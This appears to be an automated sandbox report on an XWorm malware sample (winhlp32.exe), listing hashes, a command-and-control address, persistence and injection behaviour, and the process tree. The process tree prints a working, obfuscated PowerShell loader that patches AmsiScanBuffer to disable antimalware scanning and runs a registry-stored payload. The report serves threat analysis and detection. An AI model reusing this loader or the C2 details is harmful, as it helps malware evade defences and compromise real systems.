Overview
overview
10Static
static
10fr2nnk.exe
windows10-1703-x64
10fr2nnk.exe
windows7-x64
10fr2nnk.exe
windows10-2004-x64
10fr2nnk.exe
windows11-21h2-x64
10grab.exe
windows10-1703-x64
10grab.exe
windows7-x64
7grab.exe
windows10-2004-x64
8grab.exe
windows11-21h2-x64
8m2zen.exe
windows10-1703-x64
7m2zen.exe
windows7-x64
7m2zen.exe
windows10-2004-x64
7m2zen.exe
windows11-21h2-x64
7winhlp32.exe
windows10-1703-x64
10winhlp32.exe
windows7-x64
10winhlp32.exe
windows10-2004-x64
10winhlp32.exe
windows11-21h2-x64
10Analysis
-
max time kernel
30s -
max time network
26s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
11-05-2024 09:52
Behavioral task
behavioral1
Sample
fr2nnk.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
fr2nnk.exe
Resource
win7-20240221-en
Behavioral task
behavioral3
Sample
fr2nnk.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
fr2nnk.exe
Resource
win11-20240426-en
Behavioral task
behavioral5
Sample
grab.exe
Resource
win10-20240404-en
Behavioral task
behavioral6
Sample
grab.exe
Resource
win7-20240221-en
Behavioral task
behavioral7
Sample
grab.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral8
Sample
grab.exe
Resource
win11-20240508-en
Behavioral task
behavioral9
Sample
m2zen.exe
Resource
win10-20240404-en
Behavioral task
behavioral10
Sample
m2zen.exe
Resource
win7-20231129-en
Behavioral task
behavioral11
Sample
m2zen.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral12
Sample
m2zen.exe
Resource
win11-20240508-en
Behavioral task
behavioral13
Sample
winhlp32.exe
Resource
win10-20240404-en
Behavioral task
behavioral14
Sample
winhlp32.exe
Resource
win7-20240419-en
Behavioral task
behavioral15
Sample
winhlp32.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral16
Sample
winhlp32.exe
Resource
win11-20240419-en
General
-
Target
winhlp32.exe
-
Size
205KB
-
MD5
a83dc22ef14c6b5d96aaee00b10a4973
-
SHA1
ef84a5e12797487e7a4c1acaa9f783eda6cc77d5
-
SHA256
143e319ba8ca646021e2c90acc56ebb035612146b5c8c128214da52b1386e68d
-
SHA512
0662b2fb69f781f53333c71c3f6abbb581165457662c1f6667568b07828ee4b7b056caaff7dd1c1b857bc4bcf12743eae3489de2be426035498a82bd0caaeccc
-
SSDEEP
6144:y2q1XI3ttUUcmIN1EAr4SeBid/eedR19:lq143cUcB1pzP1Xd
Malware Config
Extracted
xworm
3.0
147.185.221.18:41012
-
Install_directory
%AppData%
-
install_file
Agent.exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Windows\System32\x4L.exe family_xworm behavioral15/memory/4976-22-0x0000000000720000-0x0000000000738000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2292 created 616 2292 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 2300 powershell.exe 4944 powershell.exe 4340 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
winhlp32.exex4L.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation winhlp32.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation x4L.exe -
Drops startup file 2 IoCs
Processes:
x4L.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4L.lnk x4L.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4L.lnk x4L.exe -
Executes dropped EXE 2 IoCs
Processes:
x4L.exex4Shellcode.exepid process 4976 x4L.exe 3916 x4Shellcode.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
x4L.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x4L = "C:\\Users\\Admin\\AppData\\Roaming\\x4L.exe" x4L.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 ip-api.com -
Drops file in System32 directory 9 IoCs
Processes:
winhlp32.exepowershell.EXEsvchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\x4L.exe winhlp32.exe File opened for modification C:\Windows\System32\x4Shellcode.exe winhlp32.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\x4L svchost.exe File created C:\Windows\System32\x4L.exe winhlp32.exe File created C:\Windows\System32\x4Shellcode.exe winhlp32.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2292 set thread context of 448 2292 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2396 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 41 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE -
Modifies registry class 1 IoCs
Processes:
sihost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exepowershell.exepowershell.exepowershell.exepid process 2292 powershell.EXE 2292 powershell.EXE 2292 powershell.EXE 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 2300 powershell.exe 448 dllhost.exe 448 dllhost.exe 2300 powershell.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 2300 powershell.exe 448 dllhost.exe 448 dllhost.exe 4944 powershell.exe 4944 powershell.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 4340 powershell.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 4340 powershell.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe 448 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
winhlp32.exex4L.exepowershell.EXEdllhost.exepowershell.exeExplorer.EXEpowershell.exepowershell.exesvchost.exesvchost.exedescription pid process Token: SeDebugPrivilege 4280 winhlp32.exe Token: SeDebugPrivilege 4976 x4L.exe Token: SeDebugPrivilege 2292 powershell.EXE Token: SeDebugPrivilege 2292 powershell.EXE Token: SeDebugPrivilege 448 dllhost.exe Token: SeDebugPrivilege 2300 powershell.exe Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeDebugPrivilege 4944 powershell.exe Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeDebugPrivilege 4340 powershell.exe Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeAuditPrivilege 2620 svchost.exe Token: SeDebugPrivilege 4976 x4L.exe Token: SeAssignPrimaryTokenPrivilege 2272 svchost.exe Token: SeIncreaseQuotaPrivilege 2272 svchost.exe Token: SeSecurityPrivilege 2272 svchost.exe Token: SeTakeOwnershipPrivilege 2272 svchost.exe Token: SeLoadDriverPrivilege 2272 svchost.exe Token: SeSystemtimePrivilege 2272 svchost.exe Token: SeBackupPrivilege 2272 svchost.exe Token: SeRestorePrivilege 2272 svchost.exe Token: SeShutdownPrivilege 2272 svchost.exe Token: SeSystemEnvironmentPrivilege 2272 svchost.exe Token: SeUndockPrivilege 2272 svchost.exe Token: SeManageVolumePrivilege 2272 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2272 svchost.exe Token: SeIncreaseQuotaPrivilege 2272 svchost.exe Token: SeSecurityPrivilege 2272 svchost.exe Token: SeTakeOwnershipPrivilege 2272 svchost.exe Token: SeLoadDriverPrivilege 2272 svchost.exe Token: SeSystemtimePrivilege 2272 svchost.exe Token: SeBackupPrivilege 2272 svchost.exe Token: SeRestorePrivilege 2272 svchost.exe Token: SeShutdownPrivilege 2272 svchost.exe Token: SeSystemEnvironmentPrivilege 2272 svchost.exe Token: SeUndockPrivilege 2272 svchost.exe Token: SeManageVolumePrivilege 2272 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2272 svchost.exe Token: SeIncreaseQuotaPrivilege 2272 svchost.exe Token: SeSecurityPrivilege 2272 svchost.exe Token: SeTakeOwnershipPrivilege 2272 svchost.exe Token: SeLoadDriverPrivilege 2272 svchost.exe Token: SeSystemtimePrivilege 2272 svchost.exe Token: SeBackupPrivilege 2272 svchost.exe Token: SeRestorePrivilege 2272 svchost.exe Token: SeShutdownPrivilege 2272 svchost.exe Token: SeSystemEnvironmentPrivilege 2272 svchost.exe Token: SeUndockPrivilege 2272 svchost.exe Token: SeManageVolumePrivilege 2272 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2272 svchost.exe Token: SeIncreaseQuotaPrivilege 2272 svchost.exe Token: SeSecurityPrivilege 2272 svchost.exe Token: SeTakeOwnershipPrivilege 2272 svchost.exe Token: SeLoadDriverPrivilege 2272 svchost.exe Token: SeSystemtimePrivilege 2272 svchost.exe Token: SeBackupPrivilege 2272 svchost.exe Token: SeRestorePrivilege 2272 svchost.exe Token: SeShutdownPrivilege 2272 svchost.exe Token: SeSystemEnvironmentPrivilege 2272 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
Conhost.exex4L.exepid process 3392 Conhost.exe 4976 x4L.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
winhlp32.execmd.exepowershell.EXEdllhost.exedescription pid process target process PID 4280 wrote to memory of 4976 4280 winhlp32.exe x4L.exe PID 4280 wrote to memory of 4976 4280 winhlp32.exe x4L.exe PID 4280 wrote to memory of 3916 4280 winhlp32.exe x4Shellcode.exe PID 4280 wrote to memory of 3916 4280 winhlp32.exe x4Shellcode.exe PID 4280 wrote to memory of 3916 4280 winhlp32.exe x4Shellcode.exe PID 4280 wrote to memory of 2932 4280 winhlp32.exe cmd.exe PID 4280 wrote to memory of 2932 4280 winhlp32.exe cmd.exe PID 2932 wrote to memory of 2396 2932 cmd.exe timeout.exe PID 2932 wrote to memory of 2396 2932 cmd.exe timeout.exe PID 2292 wrote to memory of 448 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 448 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 448 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 448 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 448 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 448 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 448 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 448 2292 powershell.EXE dllhost.exe PID 448 wrote to memory of 616 448 dllhost.exe winlogon.exe PID 448 wrote to memory of 668 448 dllhost.exe lsass.exe PID 448 wrote to memory of 960 448 dllhost.exe svchost.exe PID 448 wrote to memory of 384 448 dllhost.exe dwm.exe PID 448 wrote to memory of 740 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1048 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1080 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1088 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1228 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1248 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1276 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1332 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1428 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1440 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1460 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1468 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1604 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1632 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1696 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1744 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1804 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1852 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1948 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1968 448 dllhost.exe svchost.exe PID 448 wrote to memory of 1980 448 dllhost.exe svchost.exe PID 448 wrote to memory of 2020 448 dllhost.exe svchost.exe PID 448 wrote to memory of 2084 448 dllhost.exe spoolsv.exe PID 448 wrote to memory of 2220 448 dllhost.exe svchost.exe PID 448 wrote to memory of 2272 448 dllhost.exe svchost.exe PID 448 wrote to memory of 2308 448 dllhost.exe svchost.exe PID 448 wrote to memory of 2440 448 dllhost.exe svchost.exe PID 448 wrote to memory of 2452 448 dllhost.exe svchost.exe PID 448 wrote to memory of 2604 448 dllhost.exe svchost.exe PID 448 wrote to memory of 2620 448 dllhost.exe svchost.exe PID 448 wrote to memory of 2696 448 dllhost.exe sysmon.exe PID 448 wrote to memory of 2720 448 dllhost.exe svchost.exe PID 448 wrote to memory of 2728 448 dllhost.exe svchost.exe PID 448 wrote to memory of 3012 448 dllhost.exe sihost.exe PID 448 wrote to memory of 3036 448 dllhost.exe svchost.exe PID 448 wrote to memory of 3060 448 dllhost.exe unsecapp.exe PID 448 wrote to memory of 2828 448 dllhost.exe taskhostw.exe PID 448 wrote to memory of 3076 448 dllhost.exe svchost.exe PID 448 wrote to memory of 3332 448 dllhost.exe svchost.exe PID 448 wrote to memory of 3424 448 dllhost.exe Explorer.EXE PID 448 wrote to memory of 3576 448 dllhost.exe svchost.exe PID 448 wrote to memory of 3756 448 dllhost.exe DllHost.exe PID 448 wrote to memory of 3920 448 dllhost.exe RuntimeBroker.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{15070d3f-cde2-4f4c-b6e4-5804705bbf53}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:njewKSKxwtIq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wKbokpSPGOsdxi,[Parameter(Position=1)][Type]$FIRpOkCrBC)$BrVaUBUABXV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+'eg'+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+'e'+'','C'+[Char](108)+''+'a'+''+[Char](115)+'s'+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+''+'e'+''+'a'+''+[Char](108)+''+[Char](101)+''+'d'+','+'A'+'ns'+[Char](105)+''+'C'+'las'+[Char](115)+','+'A'+''+'u'+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$BrVaUBUABXV.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+'c'+'i'+''+'a'+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+'de'+'B'+'yS'+[Char](105)+'g,'+[Char](80)+''+'u'+'b'+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$wKbokpSPGOsdxi).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+'e'+''+'d'+'');$BrVaUBUABXV.DefineMethod('I'+[Char](110)+'v'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+',N'+'e'+''+'w'+''+[Char](83)+''+[Char](108)+''+'o'+'t'+[Char](44)+'V'+'i'+''+'r'+'tua'+'l'+'',$FIRpOkCrBC,$wKbokpSPGOsdxi).SetImplementationFlags(''+'R'+''+[Char](117)+'nti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+'d');Write-Output $BrVaUBUABXV.CreateType();}$WDnKvpNzhINvk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')}).GetType('Mi'+'c'+'ro'+[Char](115)+'o'+[Char](102)+'t'+'.'+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'ns'+'a'+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+'v'+''+'e'+''+[Char](77)+'et'+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$ZcczOYZecLsSOF=$WDnKvpNzhINvk.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+'roc'+[Char](65)+''+[Char](100)+''+[Char](100)+'re'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+'ta'+'t'+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xSYQOnOTNlMkMdDzqgH=njewKSKxwtIq @([String])([IntPtr]);$JtoMnhjFsCCWftrGSZBsJy=njewKSKxwtIq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$tKaLFbhIPkJ=$WDnKvpNzhINvk.GetMethod(''+'G'+'e'+[Char](116)+''+'M'+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+'n'+'d'+'le').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+''+'e'+'l'+[Char](51)+''+[Char](50)+'.'+[Char](100)+'l'+[Char](108)+'')));$AjikdjDkyEKOSg=$ZcczOYZecLsSOF.Invoke($Null,@([Object]$tKaLFbhIPkJ,[Object]('Lo'+[Char](97)+''+'d'+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+'ry'+[Char](65)+'')));$RVaLhRTsGdePCGtYc=$ZcczOYZecLsSOF.Invoke($Null,@([Object]$tKaLFbhIPkJ,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'al'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+''+'t'+'')));$sOISXEa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AjikdjDkyEKOSg,$xSYQOnOTNlMkMdDzqgH).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+'.'+[Char](100)+''+'l'+'l');$MJYIIPyvTeUgwlhtg=$ZcczOYZecLsSOF.Invoke($Null,@([Object]$sOISXEa,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+'uf'+[Char](102)+''+'e'+''+'r'+'')));$TwUSvUvKnc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RVaLhRTsGdePCGtYc,$JtoMnhjFsCCWftrGSZBsJy).Invoke($MJYIIPyvTeUgwlhtg,[uint32]8,4,[ref]$TwUSvUvKnc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MJYIIPyvTeUgwlhtg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RVaLhRTsGdePCGtYc,$JtoMnhjFsCCWftrGSZBsJy).Invoke($MJYIIPyvTeUgwlhtg,[uint32]8,0x20,[ref]$TwUSvUvKnc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'x'+''+[Char](52)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'ge'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
